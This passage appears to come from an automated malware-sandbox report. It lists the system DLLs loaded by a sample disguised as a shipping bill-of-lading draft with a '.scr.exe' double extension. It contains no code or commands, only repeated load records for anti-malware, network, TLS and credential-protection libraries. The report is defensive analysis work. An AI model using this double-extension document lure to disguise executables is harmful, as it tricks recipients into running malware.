Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
